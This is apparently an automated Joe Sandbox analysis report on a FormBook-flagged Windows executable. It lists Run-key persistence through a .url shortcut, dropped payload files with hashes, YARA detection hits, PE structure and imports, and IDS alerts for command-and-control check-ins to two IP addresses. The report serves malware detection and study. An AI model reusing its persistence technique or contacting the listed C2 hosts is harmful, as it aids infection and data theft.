                                                      18:24:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
                                                      18:24:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
                                                      18:24:18API Interceptor1x Sleep call for process: Mwqrxeuz.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\Public\Libraries\Mwqrxeuz

                                                      Download File
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):167894
                                                      Entropy (8bit):7.836989185036909
                                                      Encrypted:false
                                                      SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                      MD5:A4230DEF1381688D96A42C48723B6FB4
                                                      SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                      SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                      SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:....4.e.4..kk.4........kk.4.......4qwym.....qw.}.m.m..{.}...o.u......mw..m..mw............w...u.......w{ws..wm{m..{uo.}m.q.q....s....4.e.4..kk.4........kk.4.......4..}..q...uy....4.e.4..kk.4........kk.4.......4....JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^......\.=....b.S.A...%.\.4O~.N.....!...e.P..zF.^..#...Uq...(..........:...8x.2...f.r.7Em X....b.F.g$....ab..X...n:.IG|...W.{s.z.

                                                      C:\Users\Public\Libraries\Mwqrxeuz.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):750592
                                                      Entropy (8bit):6.881084216281991
                                                      Encrypted:false
                                                      SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                      MD5:EDB1382C354EC6C09C53473E5335703A
                                                      SHA1:A1A5FBFCE034731CBA1072BAB6B97B26C8A90C79
                                                      SHA-256:C2C6EEC67A1561C3A49179DDF756480876D92588C2E83D64246A04C3D724CB3D
                                                      SHA-512:7A39E02E0C6B5036763A7646A5960DE36230EAEF32DA6B36687AA71170BD2125775888EC71FF112FB76A38D17D77B650089257043288FAE82598DEE5E6987ED9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 36%
                                                      Reputation:low
                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................b.......&.......0....@..............................................@........................... ...%.......$...................p...n...........................`......................$'...............................text...,........................... ..`.itext..$.... ...................... ..`.data........0......................@....bss....`6...............................idata...%... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...n...p...p..................@..B.rsrc....$.......$...N..............@..@.....................r..............@..@................................................................................................

                                                      C:\Users\Public\Libraries\Mwqrxeuz.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\Public\Libraries\zuexrqwM.url

                                                      Download File
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe">), ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):100
                                                      Entropy (8bit):5.027627100346909
                                                      Encrypted:false
                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMiCK0dAIvsGKd7DKCov:HRYFVmTWDyzM7vsb7uCy
                                                      MD5:7DDCB7FA3CEA8198D5ADEBF8F7797F74
                                                      SHA1:4552A0DFE75A7CF4875DDB3575800AE137F88E04
                                                      SHA-256:7E678198AFD5C53ADDBD2133245E72EBF9D6885F20496F5ACAEF2CF56C54856D
                                                      SHA-512:D985A2CEF6438CAA20E784A43CF752BCB1AF2608633C050DF55A194766D1C1BC3D106D7786D63E316DEF0E011E98D263C99510D7E843E8A6709F4DDFD1BA67F3
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe"..IconIndex=31..HotKey=29..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\Mwqrxeuzvim[1]

                                                      Download File
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):167894
                                                      Entropy (8bit):7.836989185036909
                                                      Encrypted:false
                                                      SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                      MD5:A4230DEF1381688D96A42C48723B6FB4
                                                      SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                      SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                      SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                      Malicious:false
                                                      Preview:....4.e.4..kk.4........kk.4.......4qwym.....qw.}.m.m..{.}...o.u......mw..m..mw............w...u.......w{ws..wm{m..{uo.}m.q.q....s....4.e.4..kk.4........kk.4.......4..}..q...uy....4.e.4..kk.4........kk.4.......4....JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^......\.=....b.S.A...%.\.4O~.N.....!...e.P..zF.^..#...Uq...(..........:...8x.2...f.r.7Em X....b.F.g$....ab..X...n:.IG|...W.{s.z.

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.881084216281991
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.38%
                                                      • InstallShield setup (43055/19) 0.43%
                                                      • Windows Screen Saver (13104/52) 0.13%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      File name:0321423605241625.exe
                                                      File size:750592
                                                      MD5:edb1382c354ec6c09c53473e5335703a
                                                      SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
                                                      SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
                                                      SHA512:7a39e02e0c6b5036763a7646a5960de36230eaef32da6b36687aa71170bd2125775888ec71ff112fb76a38d17d77b650089257043288fae82598dee5e6987ed9
                                                      SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                      TLSH:D4F47D6662D08637D02715389C07A7A8692FAEE02F14F8956BD53DCC5F383CE743926B
                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                      File Icon

                                                      Icon Hash:2321270727090923

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4626e8
                                                      Entrypoint Section:.itext
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                      DLL Characteristics:
                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:5a047051636dce23e36a7dceaf1507c0

                                                      Entrypoint Preview

                                                      Instruction
                                                      push ebp
                                                      mov ebp, esp
                                                      add esp, FFFFFFF0h
                                                      mov eax, 0046105Ch
                                                      call 00007FDD10D0EC15h
                                                      mov ecx, dword ptr [0046D410h]
                                                      mov eax, dword ptr [0046D324h]
                                                      mov eax, dword ptr [eax]
                                                      mov edx, dword ptr [00460A90h]
                                                      call 00007FDD10D615EDh
                                                      mov eax, dword ptr [0046D324h]
                                                      mov eax, dword ptr [eax]
                                                      call 00007FDD10D61661h
                                                      call 00007FDD10D0CD18h
                                                      lea eax, dword ptr [eax+00h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x720000x25ac.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x42400.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x770000x6eec.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x760000x18.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x727240x5e4.idata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x6022c0x60400False0.5191025771103897data6.531038724700122IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .itext0x620000x7240x800False0.57373046875data5.847823102407548IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .data0x630000xa49c0xa600False0.08553746234939759data6.533389727605739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .bss0x6e0000x36600x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata0x720000x25ac0x2600False0.32452713815789475data5.139331879404015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .tls0x750000x340x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rdata0x760000x180x200False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x770000x6eec0x7000False0.6196986607142857data6.6810323966616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x7e0000x424000x42400False0.4435620577830189data6.403601787519998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_CURSOR0x7ef0c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States
                                                      RT_CURSOR0x7f0400x134dataEnglishUnited States
                                                      RT_CURSOR0x7f1740x134dataEnglishUnited States
                                                      RT_CURSOR0x7f2a80x134dataEnglishUnited States
                                                      RT_CURSOR0x7f3dc0x134dataEnglishUnited States
                                                      RT_CURSOR0x7f5100x134dataEnglishUnited States
                                                      RT_CURSOR0x7f6440x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States
                                                      RT_BITMAP0x7f7780x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x7f8a00x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x7f9c80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x7faf00xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States
                                                      RT_BITMAP0x7fbd80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x7fd000x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x7fe280xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States
                                                      RT_BITMAP0x7fef80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x800200x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x801480x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x802700x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x803980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x804c00xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States
                                                      RT_BITMAP0x805a80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x806d00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x807f80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States
                                                      RT_BITMAP0x808c80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x809f00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x80b180x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x80c400x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x80d680x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x80e900xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States
                                                      RT_BITMAP0x80f780x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x810a00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x811c80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States
                                                      RT_BITMAP0x812980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                      RT_BITMAP0x813c00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                      RT_ICON0x814e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                      RT_ICON0x825900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                      RT_ICON0x84b380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736
                                                      RT_ICON0x89fc00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864
                                                      RT_STRING0x934680x200data
                                                      RT_STRING0x936680x188data
                                                      RT_STRING0x937f00xc8data
                                                      RT_STRING0x938b80x350data
                                                      RT_STRING0x93c080x3d8data
                                                      RT_STRING0x93fe00x388data
                                                      RT_STRING0x943680x418data
                                                      RT_STRING0x947800x140data
                                                      RT_STRING0x948c00xccdata
                                                      RT_STRING0x9498c0x1ecdata
                                                      RT_STRING0x94b780x3b0data
                                                      RT_STRING0x94f280x354data
                                                      RT_STRING0x9527c0x2a4data
                                                      RT_RCDATA0x955200x10data
                                                      RT_RCDATA0x955300x2a7c2GIF image data, version 89a, 300 x 168EnglishUnited States
                                                      RT_RCDATA0xbfcf40x254data
                                                      RT_RCDATA0xbff480x3e0Delphi compiled form 'TForm1'
                                                      RT_GROUP_CURSOR0xc03280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_CURSOR0xc033c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_CURSOR0xc03500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_CURSOR0xc03640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_CURSOR0xc03780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_CURSOR0xc038c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_CURSOR0xc03a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                      RT_GROUP_ICON0xc03b40x3edata

                                                      Imports

                                                      DLLImport
                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                      kernel32.dlllstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, IsValidSid
                                                      kernel32.dllSleep
                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                      comdlg32.dllGetOpenFileNameA
                                                      URLAutodialHookCallback

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.5217.160.0.9549719802031453 11/29/22-18:26:33.912103TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5217.160.0.95
                                                      192.168.2.5192.0.78.14149715802031453 11/29/22-18:26:08.582417TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5192.0.78.141
